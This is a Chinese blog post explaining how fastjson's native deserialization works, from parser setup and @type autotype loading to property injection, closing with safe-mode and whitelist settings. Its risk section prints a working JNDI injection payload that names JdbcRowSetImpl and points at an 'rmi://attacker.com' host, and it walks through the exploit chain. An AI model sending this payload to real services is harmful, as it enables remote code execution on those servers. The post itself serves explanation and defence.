news 2026/9/27 14:00:15

fastjson 原生反序列化的底层原理和执行流程

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
fastjson 原生反序列化的底层原理和执行流程

一、fastjson 反序列化核心概念

首先明确基础定义:

  • 反序列化:将 JSON 字符串转换为 Java 对象的过程,fastjson 作为高性能 JSON 库,其反序列化核心是「基于字节码生成 + 反射」的混合实现。
  • 原生反序列化:指 fastjson 默认的反序列化方式(非ParserConfig.getGlobalInstance().setSafeMode(true)等安全模式),支持完整的类加载、属性注入和方法调用。

二、fastjson 原生反序列化核心流程

fastjson 反序列化的完整执行链路可分为 5 个核心步骤,我用流程图+文字拆解:

输入JSON字符串
JSON解析器初始化
语法解析与Token提取
类加载与实例化
属性注入与方法调用
返回最终Java对象
步骤1:JSON解析器初始化

fastjson 会创建DefaultJSONParser对象,核心参数包括:

  • JSON 字符串的字符数组
  • 配置类ParserConfig(决定是否允许加载自定义类、是否开启安全模式等)
  • 特征配置Feature(如是否允许单引号、是否忽略未知属性等)

核心代码示例:

// 手动初始化解析器(fastjson底层调用逻辑)Stringjson="{\"@type\":\"com.example.User\",\"name\":\"test\"}";ParserConfigconfig=ParserConfig.getGlobalInstance();// 默认全局配置DefaultJSONParserparser=newDefaultJSONParser(json,config,Feature.Default);
步骤2:语法解析与Token提取

DefaultJSONParser通过Lexer对 JSON 字符串进行词法分析,将字符串拆分为 Token(如{、}、@type、字符串值、数字值等),核心逻辑:

  1. 识别 JSON 结构(对象/数组/基本类型);
  2. 提取关键标识:尤其是@type字段(fastjson 反序列化的核心入口,指定要实例化的类名);
  3. 校验 JSON 语法合法性(如括号匹配、引号闭合等)。
步骤3:类加载与实例化

这是反序列化的核心环节,fastjson 会根据@type指定的类名(或默认类)完成类加载和对象创建:

  1. 类加载:通过ParserConfig的checkAutoType方法校验类名(原生模式下默认允许大部分类),然后通过Class.forName加载类;
  2. 对象实例化:
    • 优先调用类的无参构造方法(如果没有无参构造且未指定 Creator,会抛出异常);
    • 支持通过@JSONCreator注解指定有参构造/静态工厂方法;
    • 对于集合/数组等容器类,会创建对应的空容器对象。

核心代码(简化版):

// 类加载逻辑(ParserConfig核心方法)publicClass<?>checkAutoType(StringtypeName,Class<?>expectClass,intfeatures){// 原生模式下跳过大部分安全校验Class<?>clazz=Class.forName(typeName,true,Thread.currentThread().getContextClassLoader());returnclazz;}// 对象实例化(JavaBeanDeserializer)publicObjectcreateInstance(DefaultJSONParserparser,Typetype){// 优先找无参构造Constructor<?>constructor=clazz.getDeclaredConstructor();constructor.setAccessible(true);returnconstructor.newInstance();}
步骤4:属性注入与方法调用

实例化对象后,fastjson 会遍历 JSON 中的键值对,完成属性赋值,核心逻辑:

  1. 属性匹配:将 JSON 的 key 与 Java 类的字段名/setter 方法匹配(支持驼峰/下划线自动转换);
  2. 类型转换:将 JSON 中的字符串/数字等值转换为 Java 字段的类型(如 String → Integer、JSON 对象 → 嵌套 Java 对象);
  3. 赋值方式:
    • 优先调用setXxx()方法(符合 JavaBean 规范);
    • 如果没有 setter,直接通过反射设置字段值(field.setAccessible(true));
  4. 特殊方法调用:
    • 对于实现java.io.Externalizable的类,会调用readExternal方法;
    • 对于自定义反序列化器(ObjectDeserializer),会调用其deserialze方法。
步骤5:返回最终对象

完成所有属性注入后,将实例化并赋值完成的 Java 对象返回,反序列化流程结束。

三、fastjson 反序列化关键组件

组件名作用
DefaultJSONParser核心解析器,负责 JSON 词法/语法分析
ParserConfig反序列化配置中心,控制类加载、自动类型检测、反序列化器注册等
JavaBeanDeserializer默认的 JavaBean 反序列化器,处理普通类的实例化和属性注入
Lexer词法分析器,将 JSON 字符串拆分为 Token
ObjectDeserializer反序列化器接口,自定义类可实现该接口定制反序列化逻辑

四、原生反序列化的核心风险(深度剖析重点)

fastjson 原生反序列化的最大问题在于@type字段的滥用,核心风险点:

  1. 任意类加载:原生模式下checkAutoType校验宽松,攻击者可通过@type指定危险类(如com.sun.rowset.JdbcRowSetImpl);
  2. 反射执行恶意代码:危险类实例化后,其属性注入过程会触发敏感方法(如JdbcRowSetImpl的setDataSourceName会触发 JNDI 调用,进而加载远程恶意类);
  3. 无参构造触发风险:部分危险类的无参构造方法本身就会执行敏感逻辑(如文件写入、命令执行)。

典型恶意 JSON 示例:

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://attacker.com/malicious.class","autoCommit":true}

执行流程:

  1. 加载JdbcRowSetImpl类 → 实例化(无参构造);
  2. 注入dataSourceName属性(调用setDataSourceName);
  3. 注入autoCommit属性(调用setAutoCommit,内部触发connect方法,访问 RMI 服务器加载恶意类);
  4. 恶意类执行命令,完成攻击。

五、fastjson 反序列化优化/安全配置

为了规避风险,实际使用中需调整配置:

  1. 开启安全模式:
    ParserConfig.getGlobalInstance().setSafeMode(true);
  2. 白名单控制:
    ParserConfigconfig=newParserConfig();config.addAccept("com.example.");// 只允许反序列化指定包下的类
  3. 禁用@type字段:
    DefaultJSONParserparser=newDefaultJSONParser(json,config,Feature.DisableSpecialKeyDetect);

总结

  1. fastjson 原生反序列化核心是「解析 JSON → 加载类 → 实例化对象 → 反射注入属性」,依赖ParserConfig控制类加载规则;
  2. @type字段是反序列化的核心入口,也是安全风险的主要来源,原生模式下校验宽松易导致任意代码执行;
  3. 生产环境必须开启安全模式/白名单,禁用不必要的@type解析,避免反序列化漏洞。
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/9/27 3:23:45

HoRain云--Java网络编程:BIO、NIO、AIO全解析

&#x1f3ac; HoRain 云小助手&#xff1a;个人主页 ⛺️生活的理想&#xff0c;就是为了理想的生活! ⛳️ 推荐 前些天发现了一个超棒的服务器购买网站&#xff0c;性价比超高&#xff0c;大内存超划算&#xff01;忍不住分享一下给大家。点击跳转到网站。 目录 ⛳️ 推荐 …

作者头像 李华
网站建设 2026/9/25 20:57:02

基于java+ vue农产投入线上管理系统(源码+数据库+文档)

农产投入线上管理 目录 基于springboot vue农产投入线上管理系统 一、前言 二、系统功能演示 三、技术选型 四、其他项目参考 五、代码参考 六、测试参考 七、最新计算机毕设选题推荐 八、源码获取&#xff1a; 基于springboot vue农产投入线上管理系统 一、前言 博…

作者头像 李华
网站建设 2026/9/27 9:08:14

LangFlow能否用于构建智能客服质检系统?会话分析实践

LangFlow在智能客服质检系统中的实践&#xff1a;从会话分析到高效落地 在现代客户服务场景中&#xff0c;每天产生的对话数据量呈指数级增长。无论是电商平台的售前咨询、金融行业的售后服务&#xff0c;还是电信企业的投诉处理&#xff0c;企业都面临着一个共同难题&#xff…

作者头像 李华
网站建设 2026/9/27 22:10:58

Open-AutoGLM加载慢怎么办?3种高效优化策略立即见效

第一章&#xff1a;Open-AutoGLM页面加载缓慢的根源剖析Open-AutoGLM作为一款基于AutoGLM架构的开源自动化工具平台&#xff0c;其页面加载性能直接影响用户体验。在实际部署中&#xff0c;部分用户反馈页面响应延迟显著&#xff0c;尤其在高并发或弱网络环境下表现尤为明显。该…

作者头像 李华
网站建设 2026/9/27 6:19:27

LangFlow能否用于构建AI心理咨询师原型?伦理边界探讨

LangFlow能否用于构建AI心理咨询师原型&#xff1f;伦理边界探讨 在一场深夜的线上心理援助测试中&#xff0c;一位志愿者输入了“我今天又想自我伤害了”——系统没有立刻生成安慰语句&#xff0c;而是先触发了一个红色标记的危机干预节点&#xff0c;随后返回一条温和但坚定的…

作者头像 李华
网站建设 2026/9/27 2:06:28

Open-AutoGLM权限管理深度优化(90%开发者忽略的弹窗隐患)

第一章&#xff1a;Open-AutoGLM权限管理深度优化&#xff08;90%开发者忽略的弹窗隐患&#xff09;在集成 Open-AutoGLM 框架时&#xff0c;多数开发者仅关注功能实现&#xff0c;却忽视了权限请求时机与用户感知之间的平衡。不当的权限弹窗策略不仅会降低用户体验&#xff0c…

作者头像 李华